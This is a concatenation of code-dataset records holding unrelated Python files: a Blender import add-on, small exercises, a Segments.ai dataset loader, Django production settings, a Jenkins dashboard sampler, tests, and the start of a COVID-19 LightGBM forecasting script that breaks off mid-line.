True)\nScene.IMPORT_LIGHT_ANIMATION = BoolProperty(attr=\"IMPORT_LIGTH_ANIMATION\",default= True)\n\n\nclass SCENE_PT_importScene(bpy.types.Panel):\n bl_label = \"Import Scene\"\n bl_space_type = \"PROPERTIES\"\n bl_region_type = \"WINDOW\"\n bl_context = \"scene\"\n \n def draw(self, context):\n layout = self.layout\n scene = context.scene\n row = layout.row()\n row = layout.row()\n row.prop(scene,\"IMPORT_MATERIAL\", text='Material + Texture', icon='MATERIAL_DATA')\n \n \n row = layout.row()\n row = row.split(percentage=0.7)\n row.prop(scene,\"IMPORT_GEOMETRY\", text='Geometry Dae', icon='OBJECT_DATA')\n row = row.split(percentage=0.01)\n row.label(text=' ') \n\n row.prop(scene,\"IMPORT_GEOMETRY_ANIMATION\", text='', icon='ANIM_DATA')\n\n row = layout.row()\n row = row.split(percentage=0.7)\n row.prop(scene,\"IMPORT_CAMERA\", text='Camera', icon='CAMERA_DATA')\n row = row.split(percentage=0.01)\n row.label(text=' ')\n row.prop(scene,\"IMPORT_CAMERA_ANIMATION\", text='', icon='ANIM_DATA')\n row = layout.row()\n row = row.split(percentage=0.7)\n row.prop(scene,\"IMPORT_LIGHT\", text='Light', icon='LAMP_DATA')\n row = row.split(percentage=0.01)\n row.label(text=' ')\n row.prop(scene,\"IMPORT_LIGHT_ANIMATION\", text='', icon='ANIM_DATA')\n\n row = layout.row()\n row = row.split(percentage=0.7)\n\n row = layout.row()\n row = layout.row()\n row = layout.row()\n row = layout.row()\n row.prop(scene,\"SCL\" , text=\"Scale\")\n row = layout.row()\n row = layout.row()\n row.operator(\"object.custom_path\" , text=\"Import Scene\")\n row = layout.row()\n row = layout.row()\n row = layout.row()\n row = layout.row()\n row.label(text='Scene interchange: 1.2 beta') \n row = layout.row()\n row.label(text='wavefront(.OBJ) support ')\n layout.label(text='3DS Max, Lightwave, Maya') \n row = layout.row()\n row = layout.row()\n row = layout.row()\n row = layout.row()\n row = layout.row()\n row = layout.row()\n row = layout.row()\n layout.label(text='Copyright (C) 11-set-2011 Silvio Falcinelli')\n row = layout.row()\n layout.label(text='GNU license')\n row = layout.row()\n row = layout.row()\n\nimport bpy\nfrom bpy.props import *\n\n\nScene.path= StringProperty(name=\"file path\",\n attr=\"path\", \n description=\"simple file path\",\n maxlen= 1024,\n default= \"\")\n\nclass OBJECT_OT_CustomPath(bpy.types.Operator):\n bl_idname = \"object.custom_path\"\n bl_label = \"Scene Path\"\n __doc__ = \"\"\n\n filepath = StringProperty(name=\"File Path\", description=\"getting file path\", maxlen= 1024, default= \"\")\n\n def execute(self, context):\n scene = context.scene\n scene.path = self.properties.filepath\n namefile=stripExt(self.properties.filepath)\n print(namefile)\n bpy.data.scenes['Scene'].frame_current = 1 \n bpy.context.scene.frame_set(1) \n \n namefile=namefile.replace('_FIXED','') # nel caso venga selezionato un file processato\n \n if scene.IMPORT_GEOMETRY:\n fixCollada(namefile+'.dae')\n bpy.ops.wm.collada_import(filepath=namefile+'_FIXED.dae') \n\n print('CLEAR COLLADA PARENT LINK')\n bpy.ops.object.select_all(action='SELECT')\n bpy.ops.object.parent_clear()\n \n \n \n ### fix name ob for wavefront(obj) import\n for ob in bpy.context.scene.objects:\n \n try: \n ob.name = stripExt(ob.data.name)\n except:\n try:\n ob.name = ob.data.name ## fix obj\n except: pass \n \n try: \n ob.name = stripExt(ob.name).replace('Mesh','') #fix collada\n \n except: pass\n \n \n if not ob.data:\n try:\n ### bpy.ops.object.select_name() in DelObj ### 2.6.2 problem\n \n DelObj(ob) # in blender 2.5.9 is OK\n except:\n\n ob.name=\"z_trash\" ## patch for 2.6.2\n \n\n\n \n bpy.context.scene.frame_set(1) \n \n for cM in bpy.data.materials:\n MatName='<'+cM.name\n cM.name=(MatName.replace('<_','')).replace('<','')\n \n scene.frame_current=1\n bpy.context.scene.frame_set(1) \n \n \n \n print('INFO general check') \n load_Scn(namefile+'.scn')\n \n \n\n if scene.IMPORT_MATERIAL:\n print('INFO start material upgrade') \n for context_material in bpy.data.materials:\n \n nameFileMtl='<'+context_material.name\n context_material.name=(nameFileMtl.replace('<_','')).replace('<','') ### collada fix name\n nameFileMtl=stripFile(namefile)+\"Materials/\"+context_material.name.split('.')[0]+\".mtl\"\n \n if os.path.isfile(nameFileMtl):\n print(context_material.name)\n create_materials(nameFileMtl ,context_material) \n \n \n \n #if scene.IMPORT_MATERIAL: create_materials(namefile) \n if scene.IMPORT_GEOMETRY_ANIMATION: load_obj_mot(stripFile(namefile)) #load_obj(namefile+'.obj', context)\n if scene.IMPORT_LIGHT_ANIMATION: load_lamp_mot(stripFile(namefile)) \n if scene.IMPORT_CAMERA_ANIMATION: load_cam_mot(stripFile(namefile)) \n print(' INFO: Scene Done ') \n return {'FINISHED'}\n def invoke(self, context, event):\n wm = context.window_manager\n wm.fileselect_add(self)\n context.scene.path = context.scene.path\n return {'RUNNING_MODAL'}\n\ndef menu_func_import(self, context):\n pass\n\ndef register():\n bpy.utils.register_module(__name__)\n bpy.types.INFO_MT_file_import.append(menu_func_import)\n\ndef unregister():\n bpy.utils.unregister_module(__name__)\n bpy.types.INFO_MT_file_import.remove(menu_func_import)\n\nif __name__ == \"__main__\":\n register()","sub_path":"tools/script/blender/scenedemo.py","file_name":"scenedemo.py","file_ext":"py","file_size_in_byte":37981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"42623092","text":"import xlrd\nfrom numpy import median\nrb = xlrd.open_workbook('excel/salaries.xlsx')\nsheet = rb.sheet_by_index(0)\nvals = [sheet.row_values(rownum) for rownum in range(sheet.nrows)]\nmax = 0.0\nsum = 0.0\ncity = ''\nspec = ''\nspecialty = {}\n\nfor i in range(1, 9):\n if max < median(vals[i][1:]):\n max = median(vals[i][1:])\n city = str(vals[i][0])\n for j in range(1, 8):\n if specialty.get(vals[0][j]) != None:\n specialty[vals[0][j]] = specialty.get(vals[0][j]) + vals[i][j]\n else:\n specialty[vals[0][j]] = vals[i][j]\n\nmax = 0\nfor key, val in specialty.items():\n specialty[key] = val / 8\n if val > max:\n max = val\n spec = key\n\nprint(city, spec)\n\n\n\n","sub_path":"stepik_parsing/exercise/ex07.py","file_name":"ex07.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"568593939","text":"from __future__ import annotations\n\nimport json\nimport logging\nimport os\nfrom multiprocessing.pool import ThreadPool\nfrom typing import Any, Dict, List, Optional, Tuple, Union, cast\nfrom urllib.parse import urlparse\n\nimport numpy as np\nimport numpy.typing as npt\nimport requests\nfrom PIL import Image, UnidentifiedImageError\nfrom pydantic import parse_obj_as\nfrom segments.typing import LabelStatus, Release, SegmentsDatasetCategory\nfrom segments.utils import (\n handle_exif_rotation,\n load_image_from_url,\n load_label_bitmap_from_url,\n)\nfrom tqdm import tqdm\n\n#############\n# Variables #\n#############\nlogger = logging.getLogger(__name__)\n\n\nclass SegmentsDataset:\n \"\"\"A class that represents a Segments dataset.\n\n .. code-block:: python\n\n # pip install --upgrade segments-ai\n from segments import SegmentsClient, SegmentsDataset\n from segments.utils import export_dataset\n\n # Initialize a SegmentsDataset from the release file\n client = SegmentsClient('YOUR_API_KEY')\n release = client.get_release('jane/flowers', 'v1.0') # Alternatively: release = 'flowers-v1.0.json'\n dataset = SegmentsDataset(release, labelset='ground-truth', filter_by=['LABELED', 'REVIEWED'])\n\n # Export to COCO panoptic format\n export_format = 'coco-panoptic'\n export_dataset(dataset, export_format)\n\n Alternatively, you can use the initialized :class:`SegmentsDataset` to loop through the samples and labels, and visualize or process them in any way you please:\n\n .. code-block:: python\n\n import matplotlib.pyplot as plt\n from segments.utils import get_semantic_bitmap\n\n for sample in dataset:\n\n # Print the sample name and list of labeled objects\n print(sample['name'])\n print(sample['annotations'])\n\n # Show the image\n plt.imshow(sample['image'])\n plt.show()\n\n # Show the instance segmentation label\n plt.imshow(sample['segmentation_bitmap'])\n plt.show()\n\n # Show the semantic segmentation label\n semantic_bitmap = get_semantic_bitmap(sample['segmentation_bitmap'], sample['annotations'])\n plt.imshow(semantic_bitmap)\n plt.show()\n\n Args:\n release_file: Path to a release file, or a release class resulting from :meth:`.get_release`.\n labelset: The labelset that should be loaded. Defaults to ``ground-truth``.\n filter_by: A list of label statuses to filter by. Defaults to :obj:`None`.\n filter_by_metadata: A dict of metadata key:value pairs to filter by. Filters are ANDed together. Defaults to :obj:`None`.\n segments_dir: The directory where the data will be downloaded to for caching. Set to :obj:`None` to disable caching. Defaults to ``segments``.\n preload: Whether the data should be pre-downloaded when the dataset is initialized. Ignored if ``segments_dir`` is :obj:`None`. Defaults to :obj:`True`.\n s3_client: A boto3 S3 client, e.g. ``s3_client = boto3.client(\"s3\")``. Needs to be provided if your images are in a private S3 bucket. Defaults to :obj:`None`.\n Raises:\n :exc:`ValueError`: If the release task type is not one of: ``segmentation-bitmap``, ``segmentation-bitmap-highres``, ``image-vector-sequence``, ``bboxes``, ``vector``, ``pointcloud-cuboid``, ``pointcloud-cuboid-sequence``, ``pointcloud-segmentation``, ``pointcloud-segmentation-sequence``, ``text-named-entities``, or ``text-span-categorization``.\n :exc:`ValueError`: If there is no labelset with this name.\n \"\"\"\n\n # https://stackoverflow.com/questions/682504/what-is-a-clean-pythonic-way-to-have-multiple-constructors-in-python\n def __init__(\n self,\n release_file: Union[str, Release],\n labelset: str = \"ground-truth\",\n filter_by: Optional[Union[LabelStatus, List[LabelStatus]]] = None,\n filter_by_metadata: Optional[Dict[str, str]] = None,\n segments_dir: str = \"segments\",\n preload: bool = True,\n s3_client: Optional[Any] = None,\n ):\n self.labelset = labelset\n if isinstance(filter_by, list):\n filter_by = [f.upper() for f in filter_by]\n elif filter_by:\n filter_by = [filter_by.upper()]\n self.filter_by = filter_by\n # if self.filter_by:\n # self.filter_by = [s.lower() for s in self.filter_by]\n self.filter_by_metadata = filter_by_metadata\n self.segments_dir = segments_dir\n self.caching_enabled = segments_dir is not None\n self.preload = preload\n self.s3_client = s3_client\n\n # if urlparse(release_file).scheme in ('http', 'https'): # If it's a url\n if isinstance(release_file, str): # If it's a file path\n with open(release_file) as f:\n self.release = json.load(f)\n else: # If it's a release object\n release_file_url = release_file.attributes.url\n content = requests.get(cast(str, release_file_url)) # TODO Fix in backend.\n self.release = json.loads(content.content)\n self.release_file = release_file\n\n self.dataset_identifier = \"{}_{}\".format(\n self.release[\"dataset\"][\"owner\"], self.release[\"dataset\"][\"name\"]\n )\n\n self.image_dir = (\n None\n if segments_dir is None\n else os.path.join(\n segments_dir, self.dataset_identifier, self.release[\"name\"]\n )\n )\n\n # First some checks\n if self.labelset not in [\n labelset[\"name\"] for labelset in self.release[\"dataset\"][\"labelsets\"]\n ]:\n raise ValueError(f\"There is no labelset with name '{self.labelset}'.\")\n\n self.task_type = self.release[\"dataset\"][\"task_type\"]\n if self.task_type not in [\n \"segmentation-bitmap\",\n \"segmentation-bitmap-highres\",\n \"vector\",\n \"bboxes\",\n \"keypoints\",\n \"image-vector-sequence\",\n \"pointcloud-cuboid\",\n \"pointcloud-segmentation\",\n ]:\n raise ValueError(\n f\"You can only create a dataset for tasks of type 'segmentation-bitmap', 'segmentation-bitmap-highres', 'vector', 'bboxes', 'keypoints', 'image-vector-sequence', 'pointcloud-cuboid', 'pointcloud-segmentation' for now. Got {self.task_type}.\"\n )\n\n self.load_dataset()\n\n def load_dataset(self) -> None:\n print(\"Initializing dataset...\")\n\n # Setup cache\n if (\n self.caching_enabled\n and self.image_dir\n and not os.path.exists(self.image_dir)\n ):\n os.makedirs(self.image_dir)\n\n # Load and filter the samples\n samples = self.release[\"dataset\"][\"samples\"]\n if self.filter_by:\n filtered_samples = []\n for sample in samples:\n if sample[\"labels\"][self.labelset]:\n label_status = sample[\"labels\"][self.labelset][\"label_status\"]\n else:\n label_status = \"UNLABELED\"\n\n if self.filter_by and label_status in self.filter_by:\n filtered_samples.append(sample)\n samples = filtered_samples\n\n if self.filter_by_metadata:\n filtered_samples = []\n for sample in samples:\n # https://stackoverflow.com/a/41579450/1542912\n if self.filter_by_metadata.items() <= sample[\"metadata\"].items():\n filtered_samples.append(sample)\n samples = filtered_samples\n\n self.samples = samples\n\n # # Preload all samples (sequentially)\n # for i in tqdm(range(self.__len__())):\n # item = self.__getitem__(i)\n\n # To avoid memory overflow or \"Too many open files\" error when using tqdm in combination with multiprocessing.\n def _load_image(i: int) -> int:\n self.__getitem__(i)\n return i\n\n # Preload all samples (in parallel)\n # https://stackoverflow.com/questions/16181121/a-very-simple-multithreading-parallel-url-fetching-without-queue/27986480\n # https://stackoverflow.com/questions/3530955/retrieve-multiple-urls-at-once-in-parallel\n # https://github.com/tqdm/tqdm/issues/484#issuecomment-461998250\n num_samples = self.__len__()\n if (\n self.caching_enabled\n and self.preload\n and self.task_type not in [\"pointcloud-segmentation\", \"pointcloud-cuboid\"]\n ):\n print(\"Preloading all samples. This may take a while...\")\n with ThreadPool(16) as pool:\n # list(tqdm(pool.imap_unordered(self.__getitem__, range(num_samples)), total=num_samples))\n list(\n tqdm(\n pool.imap_unordered(_load_image, range(num_samples)),\n total=num_samples,\n colour=\"#FF9900\",\n )\n )\n\n print(f\"Initialized dataset with {num_samples} images.\")\n\n def _load_image_from_cache(\n self, sample: Dict[str, Any]\n ) -> Tuple[Optional[Image.Image], str]:\n sample_name = os.path.splitext(sample[\"name\"])[0]\n image_url = sample[\"attributes\"][\"image\"][\"url\"]\n image_url_parsed = urlparse(image_url)\n url_extension = os.path.splitext(image_url_parsed.path)[1]\n # image_filename_rel = '{}{}'.format(sample['uuid'], url_extension)\n image_filename_rel = f\"{sample_name}{url_extension}\"\n\n if image_url_parsed.scheme == \"s3\":\n image = None\n else:\n if self.caching_enabled:\n image_filename = os.path.join(self.image_dir, image_filename_rel)\n if not os.path.exists(image_filename):\n image = load_image_from_url(\n image_url, image_filename, self.s3_client\n )\n else:\n try:\n image = Image.open(image_filename)\n except UnidentifiedImageError:\n image = None\n logger.error(\n f\"Something went wrong loading image: {image_filename}\"\n )\n else:\n image = load_image_from_url(image_url, self.s3_client)\n\n image = handle_exif_rotation(image)\n\n return image, image_filename_rel\n\n def _load_segmentation_bitmap_from_cache(\n self, sample: Dict[str, Any], labelset: str\n ) -> Union[npt.NDArray[np.uint32], Image.Image]:\n sample_name = os.path.splitext(sample[\"name\"])[0]\n label = sample[\"labels\"][labelset]\n segmentation_bitmap_url = label[\"attributes\"][\"segmentation_bitmap\"][\"url\"]\n url_extension = os.path.splitext(urlparse(segmentation_bitmap_url).path)[1]\n\n if not segmentation_bitmap_url:\n return None\n\n if self.caching_enabled:\n # segmentation_bitmap_filename = os.path.join(self.image_dir, '{}{}'.format(label['uuid'], url_extension))\n segmentation_bitmap_filename = os.path.join(\n self.image_dir,\n f\"{sample_name}_label_{labelset}{url_extension}\",\n )\n if not os.path.exists(segmentation_bitmap_filename):\n return load_label_bitmap_from_url(\n segmentation_bitmap_url, segmentation_bitmap_filename\n )\n else:\n return Image.open(segmentation_bitmap_filename)\n else:\n return load_label_bitmap_from_url(segmentation_bitmap_url)\n\n @property\n def categories(self) -> List[SegmentsDatasetCategory]:\n return parse_obj_as(\n List[SegmentsDatasetCategory],\n self.release[\"dataset\"][\"task_attributes\"][\"categories\"],\n )\n # categories = {}\n # for category in self.release['dataset']['labelsets'][self.labelset]['attributes']['categories']:\n # categories[category['id']] = category['name']\n # return categories\n\n def __len__(self) -> int:\n return len(self.samples)\n\n def __getitem__(self, index: int) -> Dict[str, Any]:\n sample: Dict[str, Any] = self.samples[index]\n\n if self.task_type in [\n \"pointcloud-segmentation\",\n \"pointcloud-cuboid\",\n \"image-vector-sequence\",\n ]:\n return sample\n\n # Load the image\n image, image_filename = None, None\n try:\n image, image_filename = self._load_image_from_cache(sample)\n except (KeyError, TypeError):\n logger.error(\n f\"Something went wrong loading sample {sample['name']}: {sample}\"\n )\n\n item = {\n \"uuid\": sample[\"uuid\"],\n \"name\": sample[\"name\"],\n \"file_name\": image_filename,\n \"image\": image,\n \"metadata\": sample[\"metadata\"],\n }\n\n # Segmentation bitmap\n if (\n self.task_type == \"segmentation-bitmap\"\n or self.task_type == \"segmentation-bitmap-highres\"\n ):\n # Load the label\n try:\n label = sample[\"labels\"][self.labelset]\n segmentation_bitmap = self._load_segmentation_bitmap_from_cache(\n sample, self.labelset\n )\n attributes = label[\"attributes\"]\n annotations = attributes[\"annotations\"]\n item.update(\n {\n \"segmentation_bitmap\": segmentation_bitmap,\n \"annotations\": annotations,\n \"attributes\": attributes,\n }\n )\n except (KeyError, TypeError):\n item.update(\n {\n \"segmentation_bitmap\": None,\n \"annotations\": None,\n \"attributes\": None,\n }\n )\n\n # Vector labels\n elif (\n self.task_type == \"vector\"\n or self.task_type == \"bboxes\"\n or self.task_type == \"keypoints\"\n ):\n try:\n label = sample[\"labels\"][self.labelset]\n attributes = label[\"attributes\"]\n annotations = attributes[\"annotations\"]\n item.update({\"annotations\": annotations, \"attributes\": attributes})\n except (KeyError, TypeError):\n item.update({\"annotations\": None, \"attributes\": None})\n\n else:\n raise ValueError(\"This task type is not yet supported.\")\n\n # # transform\n # if self.transform:\n # item = self.transform(item)\n\n return item\n","sub_path":"src/segments/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":14812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"246908027","text":"from os import environ\nfrom djangobase.settings.common import *\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key\nSECRET_KEY = os.environ.get('DJANGO_SECRET_KEY')\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': environ.get(\"DATABASE_NAME\", \"\"),\n 'USER': environ.get(\"DATABASE_USER\", \"\"),\n 'PASSWORD': environ.get(\"DATABASE_PASSWORD\", \"\"),\n 'HOST': '127.0.0.1',\n 'PORT': '5432',\n }\n}\n\nINSTALLED_APPS += (\n 'raven.contrib.django.raven_compat',\n)\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#allowed-hosts\nALLOWED_HOSTS = [\n '.bjacobel.com'\n]\n\n########## CACHE CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#caches\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.memcached.PyLibMCCache',\n 'LOCATION': '127.0.0.1:11211',\n }\n}\n########## END CACHE CONFIGURATION\n\n########## AMAZON CONFIGURATION\n\nDEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'\nSTATICFILES_STORAGE = 'storages.backends.s3boto.S3BotoStorage'\n\nAWS_STORAGE_BUCKET_NAME = \"djangobase\"\nAWS_ACCESS_KEY_ID = environ.get(\"AWS_ACCESS_KEY_ID\", \"\")\nAWS_SECRET_ACCESS_KEY = environ.get(\"AWS_SECRET_ACCESS_KEY\", \"\")\nAWS_PRELOAD_METADATA = True\nAWS_QUERYSTRING_EXPIRE = 63115200\nS3_URL = 'http://djangobase.s3.amazonaws.com/'\n\nSTATIC_URL = S3_URL\nMEDIA_URL = S3_URL\n\n########## END AMAZON\n\n### DJANGO-COMPRESSOR SETTINGS ###\n\nCOMPRESS_CSS_FILTERS = (\n \"compressor.filters.cssmin.CSSMinFilter\",\n)\n\nCOMPRESS_JS_FILTERS = (\n \"compressor.filters.jsmin.JSMinFilter\", # this is actually the default but :shrug:\n)\n\nCOMPRESS_STORAGE = STATICFILES_STORAGE\n\n### END DJANGO-COMPRESSOR ###\n\n#### RAVEN ###\n\nRAVEN_CONFIG = {\n 'dsn': environ.get('RAVEN_DSN'),\n}\n\n### END RAVEN #####","sub_path":"djangobase/settings/prod.py","file_name":"prod.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"552974710","text":"x=int(input(\"Podaj liczbe w systemie dwojkowym: \"))\n\nz = 10\na = 0\nb = 0\nwhile z<=x:\n y = x%z\n if z > y and y >= z/10:\n b += 2**a\n a+=1\n z=z*10\n\n\ny = x%z\nif z > y and y >= z/10:\n b+=2**a\n\nprint(\"Liczba ta to: \", b)","sub_path":"lab02/cw_9.py","file_name":"cw_9.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"628943589","text":"# 题目给出一个字符串。要求返回所含字母种类最多为2种的最长子字符串的长度。\n# 方法1: sliding window(队列)+ 字典\n# 思路:从左到右遍历字符串,放入队列中。使用字典记录字母出现的种类和数量。如果出现的种类超过2,则不断从队列中弹出,直到队列中字母的种类\n# 不大于2,此时窗口合法。一直更新合法的窗口长度。\n# 时间复杂度: O(n)每个元素进出队列各1次。\n# 空间复杂度:O(n)给队列\nfrom collections import deque\nclass Solution:\n def lengthOfLongestSubstringTwoDistinct(self, s: str) -> int:\n # 用于建立窗口\n queue = deque()\n # 字典记录窗口的字母种类的数量\n recorder = {}\n # 记录合法窗口的大小\n result = 0\n # 从左到右遍历s\n for letter in s:\n # 不管如何,队列中加入字母\n queue.append(letter)\n # 字典计数器更新\n if letter in recorder:\n recorder[letter] += 1\n else:\n recorder[letter] = 1\n # 如果窗口中字母种类大于2,则一直从窗口左边弹出元素。直到窗口字母数量小于2\n while len(recorder.keys()) > 2:\n popOutLetter = queue.popleft()\n # 弹出的字母计数-1,如果等于0,从计数器删除。\n recorder[popOutLetter] -= 1\n if recorder[popOutLetter] == 0:\n del recorder[popOutLetter]\n\n result = max(result, len(queue))\n return result\n\n# 方法2:sliding window(指针) + 字典\n# 方法2和方法1本质一致。只是用指针而不是队列来表示窗口。\nclass Solution:\n def lengthOfLongestSubstringTwoDistinct(self, s: str) -> int:\n recorder = {}\n result = 0\n left = 0\n for index, element in enumerate(s):\n if element in recorder:\n recorder[element] += 1\n else:\n recorder[element] = 1\n while len(recorder) > 2:\n recorder[s[left]] = recorder[s[left]] - 1\n if recorder[s[left]] == 0:\n del recorder[s[left]]\n left += 1\n result = max(result, index - left + 1)\n return result\n","sub_path":"面试-LeetCode题/基础算法8-滑动窗口(SlidingWindow)/LeetCode159(LongestSubstringwithAtMostTwoDistinctCharacters)/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"444956376","text":"\n\n\n\ndef frame_as_list():\n \n \n\n prostate = h2o.import_file(path=pyunit_utils.locate(\"smalldata/prostate/prostate.csv.zip\"))\n\n (prostate % 10).show()\n (prostate[4] % 10).show()\n\n\n airlines = h2o.import_file(path=pyunit_utils.locate(\"smalldata/airlines/allyears2k_headers.zip\"))\n\n (airlines[\"CRSArrTime\"] % 100).show()\n\n\nframe_as_list()\n","sub_path":"h2o-py/tests/testdir_munging/binop/pyunit_mod.py","file_name":"pyunit_mod.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"14143677","text":"import random\nlis = []\nfor i in range(20):\n lis.append(random.randint(1, 100))\nprint(lis)\n\n\ndef bubble_sort(arr):\n for i in range(len(arr) - 1):\n for j in range(len(arr) - 1):\n if arr[j] < arr[j + 1]:\n arr[j], arr[j + 1] = arr[j + 1], arr[j]\n\n\nbubble_sort(lis)\nprint(lis)\n","sub_path":"snippets/bubble_sort.py","file_name":"bubble_sort.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"577097129","text":"import datetime\nimport jenkins\nimport json\nfrom rhos_dashboard.repeated_timer import RepeatedTimer\n\n\nclass Rhos(object):\n\n def __init__(self, app, interval):\n self._app = app\n self._timer = RepeatedTimer(interval, self._run)\n self.server = jenkins.Jenkins('http://rhos-jenkins.rhev-ci-vms.eng.rdu2.redhat.com', 'dashboard', 'dashboard')\n\n def stop(self):\n self._timer.stop()\n\n def name(self):\n \"\"\"Child class implements this function\"\"\"\n return 'UnknownSampler'\n\n def sample(self):\n \"\"\"Child class implements this function\"\"\"\n return {}\n\n def _send_event(self, widget_id, body):\n body['id'] = widget_id\n body['updatedAt'] = datetime.datetime.now().strftime(\n '%Y-%m-%d %H:%M:%S +0000')\n formatted_json = 'data: %s\\n\\n' % (json.dumps(body))\n self._app.last_events[widget_id] = formatted_json\n for event_queue in self._app.events_queue.values():\n event_queue.put(formatted_json)\n\n def release_status(self, build_result):\n \"\"\"Returns release CI status.\"\"\"\n\n if build_result == 'SUCCESS':\n return 'green'\n elif build_result == 'FAILURE':\n return 'red'\n elif build_result == 'UNSTABLE':\n return 'yellow'\n else:\n return 'error'\n\n def _run(self):\n data = self.run()\n if data:\n self._send_event(self.name(), data)\n","sub_path":"rhos_dashboard/rhos.py","file_name":"rhos.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"533293395","text":"'''@author Samuel Tenka\n'''\n\nimport unittest\nfrom JP2 import JP2\n\nclass TestJP2(unittest.TestCase):\n def __init__(self, *args, **kwargs):\n unittest.TestCase.__init__(self, *args, **kwargs)\n self.rectangle = JP2('testjp2_rectangle.jpg')\n self.diamond = JP2('testjp2_diamond.jpg')\n def assert_weights_close(self, weight, target, area, thresh=0.05):\n error = (weight-target)/float(area)\n print(error)\n self.assertTrue(abs(error) < thresh)\n def test_weights(self):\n w_black_rect = self.rectangle.weight_on(60,60,120,120)\n self.assert_weights_close(w_black_rect, 60*60, 60*60)\n w_white_rect = self.rectangle.weight_on(120,120,180,180)\n self.assert_weights_close(w_white_rect, 0, 60*60)\n w_diamond = self.diamond.weight_on(0,0,256,256)\n self.assert_weights_close(w_diamond, (256*256)/2 - 128*128, 256*256)\n\nif __name__=='__main__':\n unittest.main()\n","sub_path":"code/sam_scratchwork/End2EndRedo/End2End/Base/test_JP2.py","file_name":"test_JP2.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"460515734","text":"from pathlib import Path\nimport lightgbm as lgb\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.preprocessing import LabelEncoder\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\ndata_dir = Path('D:\\\\PythonTests\\\\Testing Kaggle\\\\19\\\\covid19-global-forecasting-week-4\\\\')\nPATH_TRAIN = data_dir/'train.csv'\nPATH_TEST = data_dir/'test.csv'\n#PATH_TRAIN = \"/kaggle/input/covid19-global-forecasting-week-4/train.csv\"\n#PATH_TEST = \"/kaggle/input/covid19-global-forecasting-week-4/test.csv\"\n\nPATH_SUBMISSION = \"submission.csv\"\nPATH_OUTPUT = \"output.csv\"\n\nPATH_REGION_METADATA = data_dir/'region_metadata.csv'\nPATH_REGION_DATE_METADATA = data_dir/'region_date_metadata.csv'\n#PATH_REGION_METADATA = \"/kaggle/input/covid19-forecasting-metadata/region_metadata.csv\"\n#PATH_REGION_DATE_METADATA = \"/kaggle/input/covid19-forecasting-metadata/region_date_metadata.csv\"\n\nVAL_DAYS = 7\nMAD_FACTOR = 0.5\nDAYS_SINCE_CASES = [1, 10, 50, 100, 500, 1000, 5000, 10000]\n\nSEED = 666\n\nLGB_PARAMS = {\"objective\": \"regression\",\n \"num_leaves\": 5,\n \"learning_rate\": 0.013,\n \"bagging_fraction\": 0.91,\n \"feature_fraction\": 0.81,\n \"reg_alpha\": 0.13,\n \"reg_lambda\": 0.13,\n \"metric\": \"rmse\",\n \"seed\": SEED\n }\n\n \ntrain = pd.read_csv(PATH_TRAIN)\ntest = pd.read_csv(PATH_TEST)\n\n\ntrain = train[train['Country_Region'] == \"Bulgaria\"]\ntest= test[test['Country_Region'] == \"Bulgaria\"]\n\n\nregion_metadata = pd.read_csv(PATH_REGION_METADATA)\nregion_date_metadata = pd.read_csv(PATH_REGION_DATE_METADATA)\n\n\ntrain = train.merge(test[[\"ForecastId\", \"Province_State\", \"Country_Region\", \"Date\"]], on = [\"Province_State\", \"Country_Region\", \"Date\"], how = \"left\")\ntest = test[~test.Date.isin(train.Date.unique())]\n\ndf_panel = pd.concat([train, test], sort = False)\n\n# combining state and country into 'geography'\ndf_panel[\"geography\"] = df_panel.Country_Region.astype(str) + \": \" + df_panel.Province_State.astype(str)\ndf_panel.loc[df_panel.Province_State.isna(), \"geography\"] = df_panel[df_panel.Province_State.isna()].Country_Region\n\n# fixing data issues with cummax\ndf_panel.ConfirmedCases = df_panel.groupby(\"geography\")[\"ConfirmedCases\"].cummax()\ndf_panel.Fatalities = df_panel.groupby(\"geography\")[\"Fatalities\"].cummax()\n\n# merging external metadata\ndf_panel = df_panel.merge(region_metadata, on = [\"Country_Region\", \"Province_State\"])\ndf_panel = df_panel.merge(region_date_metadata, on = [\"Country_Region\", \"Province_State\", \"Date\"], how = \"left\")\n\n# label encoding continent\ndf_panel.continent = LabelEncoder().fit_transform(df_panel.continent)\ndf_panel.Date = pd.to_datetime(df_panel.Date, format = \"%Y-%m-%d\")\n\ndf_panel.sort_values([\"geography\", \"Date\"], inplace = True)\n\n\n## feature engineering\nmin_date_train = np.min(df_panel[~df_panel.Id.isna()].Date)\nmax_date_train = np.max(df_panel[~df_panel.Id.isna()].Date)\n\nmin_date_test = np.min(df_panel[~df_panel.ForecastId.isna()].Date)\nmax_date_test = np.max(df_panel[~df_panel.ForecastId.isna()].Date)\n\nn_dates_test = 